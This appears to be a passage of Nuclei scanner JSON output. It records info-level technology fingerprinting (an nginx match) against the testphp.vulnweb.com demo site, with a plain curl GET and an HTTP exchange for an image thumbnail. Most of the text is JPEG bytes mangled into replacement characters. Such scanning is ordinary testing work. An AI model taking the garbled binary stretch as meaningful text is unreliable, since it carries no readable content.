ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:35:01.563777313Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"path\":\"/pictures/6.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"request\":\"GET /pictures/6.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4345\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:35:04 GMT\\r\\nEtag: \\\"4dca64a1-10f9\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001d\\u0000\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0003\\u0005\\u0006\\u0007\\u0008\\t\\u0002\\u0001\\ufffd\\ufffd\\u0000:\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0001\\u0006\\u0004\\u0004\\u0007\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061\\u0007\\u0013\\\"AQa\\u00142q\\ufffd\\ufffd\\ufffd\\u0015#B\\ufffd\\u0008R\\ufffd\\ufffd\\u0016$br\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0006\\u0005\\u0007\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0001\\u0006\\u0005\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0005\\u0012A\\\"\\u0006\\u0013\\u0014aq\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdBQ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdJR\\ufffd\\u0000\\ufffd~\\ufffd\\ufffd\\ufffd'\\ufffd\\rz5\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffdPU\\ufffdpT\\u0012\\t\\ufffd$\\ufffda߷֛)\\ufffd\\u001f\\ufffd\\ufffdT\\ufffd\\ufffdĩUn \\ufffd\\ufffdy!\\ufffd7\\ufffdXث\\ufffd\\ufffd\\n\\ufffdpA\\u0007\\ufffd~C\\u001b\\ufffd*\\ufffd\\u0012\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdO`)\\ufffd\\u0014\\ufffd[n?\\u000bm\\ufffd\\ufffd\\ufffd_\\ufffd\\ufffdFv\\ufffd\\ufffd\\ufffd@Hls\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd:\\ufffdu\\u000f\\ufffd\\ufffdݣ\\ufffde.\\ufffd\\ufffd\\\"\\ufffdG\\ufffd#\\u003c7\\ufffd\\ufffd#\\u0004\\ufffd0Mh\\ufffd)\\ufffdq.\\t\\u001dR^\\t\\ufffd\\u0015\\ufffd\\u0017\\ufffd]iڽ\\ufffd\\ufffd-\\ufffd\\u0013,',\\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003c\\ufffd;\\ufffd\\ufffdgu\\u001e\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdP\\t\\ufffde\\ufffd7*\\ufffd\\ufffd'\\ufffd\\u0000\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u000cVR\\ufffdLH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\u001c\\ufffdˑ\\ufffd\\u0007\\u0015\\ufffdi]=\\u0012\\ufffd+.X\\u00101\\ufffd\\ufffd\\ufffd9\\u0003۵f\\ufffd\\ufffdI\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\ufffdMa\\u001cg\\ufffd\\ufffdM\\ufffd^\\ufffdkp1$M\\ufffd\\ufffd\\u0010\\u000f\\ufffd\\u0019\\u0000\\ufffd\\ufffd\\u0011\\ufffd\\\"\\ufffdWV\\ufffd/OEu%\\ufffd\\u0017\\u0010\\ufffd,\\ufffdݸ\\u003ep0\\ufffdl\\ufffd\\ufffd\\u0003 \\ufffd\\\\v\\ufffd\\ufffd=K\\ufffdE\\ufffdot\\ufffd\\ufffd\\ufffd[iZ3\\ufffd\\n\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffdE\\ufffd\\ufffd\\ufffd;rS\\ufffd\\ufffd[-ԥ*\\ufffd\\u0008\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\nR\\ufffdDŽ\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\u0012\\ufffd\\ufffd६\\ufffdC ~1\\ufffd\\u001c烐p1ۜT:\\ufffdEzx;,xHt \\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd[T\\ufffd\\ufffdOan\\ufffd\\ufffd\\u0014\\ufffd6]FH \\ufffd\\ufffd~\\u000e\\ufffd\\ufffd\\ufffd\\ufffdJi\\ufffd\\ufffd\\u0014\\ufffd\\ufffdj;\\ufffd\\ufffd\\ufffdOW\\ufffd\\u001f\\ufffd\\u001f53\\ufffd\\ufffd4\\ufffd\\ufffdn$\\ufffd\\ufffd9\\u0012eo0\\ufffd`\\ufffdb\\ufffd9\\u0001\\ufffd#,\\ufffd\\ufffd\\u0004\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd.\\u0012g\\ufffd[{\\ufffd\\\\1\\u000c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdazj\\ufffd\\ufffd\\ufffd\\ufffd-\\u003e\\ufffd\\ufffd\\ufffdMa\\ufffd\\ufffd\\u0011\\ufffdꚽ\\ufffd\\ufffd\\u0018f\\ufffdG\\ufffdq\\u0012\\u0026\\ufffd\\u00263\\ufffd\\ufffdQ\\ufffd0T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd[^\\ufffdIs\\ufffdtp\\ufffd[1\\u000c{\\ufffd\\r\\ufffd\\ufffd~\\u0004\\ufffd\\u0000z\\ufffd5\\ufffdG\\u0012eG\\ufffd:\\ufffd@8'\\ufffd\\u001e@\\ufffd \\u0001\\ufffd\\ufffd\\u0000H\\ufffd\\\\6\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd \\ufffd\\u001c\\ufffdƌz\\ufffd\\ufffd;\\ufffd\\ufffd1\\ufffdy\\ufffd\\ufffd\\u0013\\\\\\ufffd=\\ufffd\\ufffd\\ufffd\\n*\\\\~ÝUJO(\\ufffdZD!\\u0002$\\ufffd\\ufffde\\ufffd\\u000eCn\\u001fF\\u001c\\u001fʯ\\ufffdt\\ufffdw\\ufffdK\\u001cc\\u0002u-\\u001b\\ufffd68\\ufffd\\u0019?\\\\sߜ\\ufffdqY\\ufffd\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffd뱉b\\n\\ufffd\\ufffd\\ufffd\\u003e~\\ufffdZ\\ufffd\\ufffd8S\\ufffdQ\\ufffd\\ufffd\\ufffds\\ufffdU;z\\ufffd\\ufffd\\ufffd\\ufffd̙(\\ufffd\\ufffd[\\ufffdX]DV\\u001b\\ufffdW}\\ufffd\\u0002\\\\\\u0000\\t\\u001c\\u001e\\ufffd\\ufffd\\ufffd\\u0008\\ufffdY\\ufffd\\ufffdh\\ufffdF\\ufffd\\ufffd\\n4\\ufffd\\ufffda\\ufffd\\ufffd8\\ufffdl\\ufffd\\u001e;\\ufffd\\u0013\\ufffd*\\ufffd5\\ufffd\\ufffd^-\\ufffd\\ufffd3\\ufffd\\u0001 pO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\u0003\\u0018\\ufffdn#B\\u0019J\\ufffd\\u003c\\ufffd\\u001e\\ufffd\\ufffd]F\\ufffd\\ufffd/\\ufffd'zQ\\ufffd\\ufffdd\\ufffd0\\\\}\\ufffdy\\u001b|ou4H\\u0013\\ufffd\\ufffdY\\ufffdg#\\ufffd\\ufffd3\\\\\\ufffd\\ufffd$\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\\"G\\ufffdZ\\ufffd\\ufffd1\\ufffdy\\ufffd\\u00267\\ufffd\\ufffd\\ufffd3\\ufffd\\u0000\\ufffd}\\ufffd\\ufffd.\\ufffd\\ufffd\\ufffdNH\\ufffd\\ufffd0\\ufffd\\r\\ufffdg\\t\\ufffdL\\u0012\\u0000\\ufffd\\ufffd\\ufffdX\\u000f\\ufffd\\u001e\\u001f\\ufffd\\ufffd\\ufffdؠ\\ufffd\\ufffd\\u001e\\ufffd\\u000c\\ufffdu\\ufffd\\ufffdp\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\u0014\\ufffd\\\\\\ufffd\\ufffd\\u0007\\u0007\\u0018=N\\ufffd\\ufffd#\\ufffd\\ufffdE\\ufffd\\ufffd/)\\ufffd\\ufffd\\ufffd7\\ufffd{\\u000c.N \\ufffdJԬ\\ufffd\\ufffdo\\ufffd,\\ufffd#1\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-zj\\ufffdtr\\ufffd*\\ufffdA\\\"\\ufffd\\ufffd\\ufffda\\u0013\\ufffd\\\"\\ufffd\\u000e\\u000b\\u0000\\t\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd@\\nR\\ufffd\\u0000\\ufffd)@\\nݽ\\u0019\\ufffd\\u000e\\ufffd\\ufffdtJi7\\ufffd;\\u000f\\ufffd\\u0008\\u001d\\u0004W6Q\\ufffd^bn\\u001b\\ufffd\\ufffdr\\ufffd\\u0000\\u0001݇\\u000cG\\ufffdq\\ufffd\\ufffd*U}N\\ufffd\\ufffdTT-YI\\ufffdt\\u0026\\ufffd\\ufffd\\u0013\\ufffdn\\ufffd\\ufffd\\ufffd7\\ufffdtKy\\ufffdn-\\ufffd%x\\u0004\\ufffd\\u0008Ϩ\\u000c.C\\u0002\\u0000ʳ\\u0005$pH8\\ufffd\\u0008[\\ufffd\\ufffd\\\"]\\ufffd-\\ufffd\\ufffd\\ufffd,\\ufffdr-\\\\\\u0004i\\ufffd\\ufffd#.Oel\\u0010\\u001b\\ufffd;O#\\u0019\\ufffdO\\n\\ufffd@\\ufffd\\ufffd}n9\\ufffd.\\ufffd\\u000f i\\ufffd\\u0007\\ufffd\\ufffdo\\ufffd\\u0003\\ufffd\\nϺ\\ufffd\\ufffd[\\ufffdg\\ufffd4\\ufffdm\\u003c\\ufffd:\\ufffd\\ufffdY\\ufffd\\ufffd+mf\\ufffd\\ufffd\\ufffdn\\ufffd\\u0015\\ufffdM\\ufffd\\ufffdFw\\ufffd\\ufffd\\u0007z\\ufffd_\\ufffdŰԿq\\ufffd1\\ufffd\\ufffd\\u001f,y-\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd}2\\ufffd\\u0005 x\\ufffdQ\\u003cBkq'\\u000f\\ufffd\\u0003r\\ufffd\\ufffd\\ufffdI\\u0003\\u001f\\u0004|\\u001a\\ufffd%\\ufffdb΀\\ufffd\\u0007'\\ufffd\\ufffd.\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdݕ\\ufffd\\ufffd\\ufffd\\ufffd\\u0015i!\\ufffd+\\ufffd1\\ufffd\\u0001\\u000e\\ufffd%\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\ufffdF+=\\ufffdb\\ufffd\\ufffd1ナ\\ufffdYMt݋\\ufffd\\ufffdș\\ufffd\\u0019Dt\\ufffd\\ufffd\\u0014\\\\\\ufffd\\u000e_fcRC}x\\ufffd\\u000fDZ\\ufffd\\u003e\\ufffd\\rݵմ\\ufffdkr\\ufffd\\u0016\\ufffd\\ufffd\\u0000ψ\\ufffd\\ufffd^0Ɂ\\ufffd\\\\\\u0013\\ufffd\\u00169\\u003c\\ufffd\\u0001W8\\ufffdY\\ufffdz\\u0015\\u003c\\ufffd;Np\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\u0003\\ufffd\\u0004\\u000eǸ\\ufffd\\ufffdДc?W\\u0001\\ufffd\\ufffd\\\"\\ufffd\\\\%\\ufffd@\\ufffd\\ufffd'\\u0001\\ufffd\\ufffdʺ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffd\\u0000\\u001a\\ufffdP\\ufffd\\ufffd7\\ufffd\\ufffd\\u001f\\ufffd \\ufffdK;\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0006\\t\\\\z\\ufffd\\u0017\\ufffd\\u0005\\ufffd\\ufffd0\\ufffd\\ufffdrx\\u0018\\u0019\\ufffdn)\\ufffdM\\ufffd\\ufffd_\\ufffdG\\\"5\\ufffdI%\\ufffd\\ufffd\\t\\u0002V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqT\\ufffd\\ufffd/,\\u000e\\ufffd\\u0019]C\\ufffd\\u0003\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0003R\\ufffd\\ufffd\\ufffda\\u0001\\u0016\\ufffd\\u0014h\\ufffdE\\ufffd\\ufffd1\\u0004\\ufffdp\\u000f\\u001f8\\ufffd\\ufffdQU\\\\\\ufffd\\ufffd\\u0016^E\\ufffd74w\\ufffd\\ufffd\\u0010\\ufffdp\\ufffdsG\\ufffdb\\ufffd\\u0015\\u0001fE?˺\\u0000\\u0000\\ufffd\\ufffd\\ufffdl\\u0000\\u0003\\u001e;\\u0006\\ufffd\\ufffd.\\u0003ᯄ6\\ufffd\\u00163[u\\ufffd\\ufffdMQ\\ufffd%b\\ufffd\\ufffdhT*\\ufffd0R;\\ufffd'\\ufffd\\ufffd\\\\`溺\\ufffd\\u0000$\\ufffd\\ufffd\\u003c\\ufffd(0\\ufffd\\u0018\\ufffd\\u0000|`\\ufffd\\ufffdU\\ufffdP\\ufffd\\ufffd]ķ\\ufffd!\\ufffdB\\ufffd\\u003e0T\\ufffda\\t\\ufffd\\ufffd\\u0019\\u001e\\ufffd\\u0000\\u0011\\ufffdgAG]\\ufffdQ\\ufffd\\ufffdf\\ufffd\\ufffd\\ufffd\\u0000RǏ\\ufffd\\ufffd\\\"\\ufffd\\u001c\\ufffd\\ufffd5~\\ufffd\\ufffdt\\ufffd\\ufffdM\\ufffd6\\ufffd\\ufffd$p\\ufffd\\ufffdI\\ufffd\\ufffd+\\ufffdm\\ufffd\\u000c\\u0002{\\ufffdx\\ufffd\\ufffd9\\u000bZ\\ufffd.\\ufffdmR\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003c\\u0010\\u000e\\u0008\\ufffd}\\rz;\\u000cP\\ufffd\\u001cN\\ufffddP7F㜃\\ufffd\\ufffdpG\\ufffd\\ufffd\\\\\\ufffd\\ufffd'|5\\ufffdL\\u000f\\ufffdZ4\\u0011\\ufffd\\ufffd)k\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd#.J\\ufffdz\\u0007$\\ufffd=9\\ufffd8\\u0002\\ufffd~\\ufffdu\\ufffd\\ufffdt^\\ufffd\\ufffd\\u001f_\\ufffd3Q\\u00055\\ufffd\\ufffd\\ufffd\\\\\\ufffd)[€\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\u001d5\\ufffd7\\ufffdK'H\\ufffd\\u001a\\ufffd\\ufffd\\ufffd}.O9\\u001eFr\\u0004\\u001d\\ufffd*\\ufffd\\u000b(\\ufffd\\r\\ufffd\\ufffdv\\u001c1\\u003co\\ufffd\\ufffdEK[\\ufffd\\ufffd\\ufffd\\ufffd1R$i\\u000b\\u0015\\ufffdc@\\ufffd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\n\\ufffd\\ufffd@\\ufffdnt]R\\u001b\\ufffd6ı\\ufffd\\ufffḑ\\ufffdS\\ufffd\\ufffdEu\\ufffd\\ufffd\\ufffd\\ufffd%\\ufffd\\ufffdq̗\\ufffd\\ufffdл\\u001c\\u0003\\ufffd$\\ufffd\\u0019\\ufffd\\ufffd)\\ufffd\\ufffd\\u000c\\ufffd\\rb\\ufffd\\ufffd\\ufffd**WU\\ufffd\\ufffd\\ufffdOgz\\ufffdf\\ufffdԄ\\ufffd\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd-\\u003c *\\ufffd\\ufffd\\u0000d1\\ufffd\\ufffd\\u0014c\\u003c\\u001f\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffdIm$\\ufffd\\ufffd:\\u000f0\\u0014V_Ab\\u0007\\ufffd\\ufffd\\u0004\\u0015*W$\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd;M\\u0006\\ufffdSYLRYrʌ]\\ufffd\\ufffd\\u0014\\u000e\\u0007\\ufffd\\ufffd\\u00198\\ufffd\\t\\ufffdlU\\ufffdÿ\\u0013\\ufffd\\ufffd\\ufffdd\\ufffd\\u0013ej\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\u0000\\u0018e*\\ufffd6{z\\u0018}\\ufffd\\u000e\\u001d\\u001d3U\\n%j_-\\ufffd\\ufffd\\u0000G\\ufffd4\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdbIc\\ufffdf\\u0001ܣ%\\u001aA\\ufffd'\\ufffdRN\\u0014\\n\\ufffdb\\u003eߤ\\ufffd\\ufffd\\ufffd\\u003eZ2\\ufffdg\\u0008\\ufffd\\ufffdr\\ufffd\\ufffdr\\n\\ufffd#\\ufffd\\ufffd\\ufffd-N\\ufffd\\ufffd\\ufffd\\t\\ufffdl\\ufffd2\\ufffdBF\\u000f\\ufffd\\u0011\\ufffdE}i\\ufffd\\ufffd'\\ufffd\\ufffdܬ2yh\\ufffd\\ufffdlM\\ufffd\\ufffd\\ufffd\\ufffd@?\\ufffd\\u000f\\u001d\\ufffd\\ufffd)O\\ufffd\\u0012\\ufffd\\\"4\\ufffd\\ufffd\\u0017\\u000b4A\\ufffdӆ(\\ufffdN@e$0\\u0007\\u0003 \\u0010Goj4\\ufffd\\u0000b\\ufffd\\ufffdW\\u0002\\t1\\ufffdg\\u003cq\\ufffd\\ufffd?\\u000b\\ufffd1\\ufffd\\ufffd\\ufffdN\\u0013\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd8\\u000e\\ufffd\\ufffd1\\u001a\\ufffd\\u0007\\ufffdrs\\ufffd\\ufffd\\u0000J\\ufffd4{\\ufffd{eNy\\ufffd\\ufffd\\u0000l\\ufffd\\ufffd\\ufffdN\\ufffd'\\r\\ufffd\\ufffdڟ%\\ufffd\\ufffd9?\\ufffd\\\\H\\ufffd\\ufffd樑d\\u000e\\ufffdy\\ufffdvc\\u0018\\ufffdl\\u001eC\\u000c\\ufffd\\ufffdc?\\ufffd\\ufffdu\\u0017\\ufffd:\\ufffd\\u0018\\u0015 \\ufffd\\ufffd\\ufffd9\\u0007\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffdh\\ufffdf\\ufffd\\ufffdN\\ufffd? g\\ufffd##\\u003e٩v\\ufffd)q\\n\\ufffd\\u0013\\u0006\\u000c\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd9+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffdأ%\\ufffd\\ufffd}\\ufffd\\u0018\\u0000x݁uw\\u003cr2\\ufffdy\\ufffd\\u0019\\ufffd܏bI0z\\ufffdN\\ufffdR\\ufffd\\ufffd\\ufffdh\\ufffd{gc\\ufffdG*\\ufffd\\ufffd\\ufffdF\\u0018!\\ufffd\\u000er;\\u000c\\ufffd\\ufffdo\\ufffd!\\ufffdX\\ufffd\\ufffd\\ufffdv\\ufffd\\u0000\\ufffd\\u0003\\u0003;\\ufffd d\\ufffd\\u0000H'\\u0007\\ufffd\\ufffdy\\u0014Yb\\ufffd\\ufffd\\ufffd\\ufffd/\\u001f\\ufffd\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffdBj:O^\\ufffd\\ufffd\\ufffd\\ufffdks~\\ufffd\\ufffde\\ufffd\\ufffd\\u000b\\ufffd\\ufffd\\u000c7#\\ufffd\\u0001\\ufffdOr\\u0006\\u0001\\u000c=\\ufffd\\ufffdֽ\\u0019\\ufffd\\ufffdeݬ\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdȌ\\u001d\\u001cP\\u000c?\\ufffdO\\u0004w\\u0007\\ufffdA=ܶV\\ufffdk\\ufffd$\\ufffd \\ufffd\\ufffd\\ufffdCi+\\u0016$$\\ufffd\\u0017\\ufffd9\\u003e\\ufffd\\u0019\\u001c\\u000c2ջ\\ufffd.\\ufffd\\ufffd\\ufffdΓ\\ufffdѵ+cotS̷\\ufffd\\u001b\\\\E0\\ufffd\\n\\ufffd3\\ufffd0r\\u0001*\\ufffd\\ufffd\\ufffd6\\ufffdj\\ufffd\\ufffd\\\\m\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^zd\\ufffd\\ufffd\\ufffd\\ufffdVs\\ufffdx[\\ufffd\\ufffde\\ufffd\\ufffduu\\ufffdI\\ufffdm8o\\ufffdt\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\t\\ufffd̀\\u001eX\\u000c.\\u0018\\u001c\\u0015l`ղ\\ufffd\\ufffd\\ufffdY\\ufffdI\\ufffd\\n\\ufffd.\\u003c\\ufffdR\\ufffd \\ufffd\\ufffd\\ufffd\\u0000+$鞮\\ufffdzz\\ufffdh\\ufffdXs\\ufffdE\\ufffd\\ufffdS\\u00122G\\u003e\\ufffdc\\ufffd\\ufffdt\\ufffd\\ufffd\\u0011\\ufffdĖP\\ufffd\\ufffd\\ufffd\\u0026˩\\ufffdM\\u0014\\ufffd\\ufffdw\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,\\t\\ufffd\\u003e\\ufffd\\u0000P)\\ufffdj7:N\\ufffd\\r唅'\\ufffd\\ufffd\\u0003\\ufffd~\\ufffd\\ufffdj\\u0015)ZMa\\ufffd\\ufffd:\\ufffd\\ufffdz\\ufffd\\u0014\\ufffdi.\\r\\ufffd0\\ufffd\\ufffdb\\ufffd6\\ufffd.~\\ufffd\\u0012I\\ufffd\\ufffdϾs\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdV\\r\\ufffd\\ufffd\\ufffd˒\\ufffd\\u0016%s\\ufffd\\u003c\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffd\\\\\\ufffdG\\ufffd7NH\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffd\\u003cՌ\\u003eF@,\\ufffdw\\u0003\\ufffds\\ufffd9\\\"\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=jd\\u0026W\\ufffd\\ufffdԏ1\\ufffdm\\ufffd\\ufffdڟ@\\ufffd\\ufffdܱ\\ufffd\\ufffd\\u0005\\ufffd4\\ufffd\\ufffdl\\ufffdQ\\ufffdK)\\ufffd|c\\ufffd:TNV\\ufffd\\u0026f)\\u0000:\\ufffd\\ufffd\\u000c9\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000f|\\ufffd\\ufffdH\\ufffd\\ufffdKx\\ufffd9\\ufffdYa\\ufffd\\u000c\\ufffdT\\ufffd\\ufffd.J\\ufffd\\ufffd]\\ufffd%\\ufffdw\\ufffd|\\ufffd\\u00260\\ufffdw\\u0003\\ufffd\\u000foҲ\\ufffd\\u000eܢ\\ufffdc\\ufffda\\ufffd\\\\SP\\ufffd\\ufffd\\u0011$2\\ufffd\\ufffd7\\u001b\\ufffd\\ufffd|~+\\u001b\\ufffd\\ufffd[[\\ufffd\\ufffd\\ufffd\\ufffd0$\\ufffdô\\u0010s\\ufffd~y\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-/\\ufffd\\ufffd_4D\\ufffdޑ\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd@\\u001f#\\ufffd\\ufffdS5m@\\\\\\ufffd\\u001e\\ufffd0ϸ\\ufffd2\\ufffd\\ufffd($\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffdN\\u001a\\u0019S-\\ufffdc\\ufffd\\ufffd62\\ufffd5\\ufffdV\\ufffdt\\ufffd\\ufffd\\ufffdVR\\ufffd\\u0019\\ufffd~\\ufffdF\\u0008 \\ufffd`\\ufffdԻ=v\\ufffd\\ufffd\\ufffdV2\\u003c\\ufffd\\u0002\\ufffdbA\\ufffd\\ufffd\\u00001' \\ufffd\\u00003ܑ\\ufffdyƓ\\ufffd\\ufffdR\\ufffdU\\ufffd\\u001d\\ufffd\\ufffd\\u0018\\ufffdE\\ufffd\\ufffd9ܟ\\ufffd\\u0003۱\\ufffd\\ufffd\\ufffd\\ufffdT=T\\ufffdƭ\\ufffd\\ufffdRyU7\\ufffd*\\ufffd\\ufffd\\tu\\u0005\\ufffdG\\u0003qQ\\ufffd\\ufffd\\ufffdƬˢO\\ufffde\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\ufffdQ\\ufffd:\\ufffd\\ufffd5\\ufffds\\ufffdF\\ufffdl\\ufffd\\u0008#\\ufffd\\u000fЃ\\ufffd\\ufffd\\ufffd\\ufffdZMom\\ufffd\\ufffds2\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd`\\u001229\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd{v\\ufffd\\u001c\\ufffd\\ufffdV\\ufffd\\u0018u#\\ufffd\\ufffd@\\ufffd\\ufffd\\\\\\ufffd\\ufffd_X\\ufffd\\ufffdRА;\\\\+\\ufffdY\\ufffd}\\u0003\\ufffd\\ufffd\\u001c\\ufffd\\ufffd+\\ufffd\\ufffd*N\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd?an\\ufffdW\\u0013lx\\ufffd\\ufffd/\\ufffd\\ufffd\\u0017\\ufffd\\ufffd\\ufffdt\\ufffdwD4N\\ufffd\\ufffdI\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\u001d\\ufffd@? 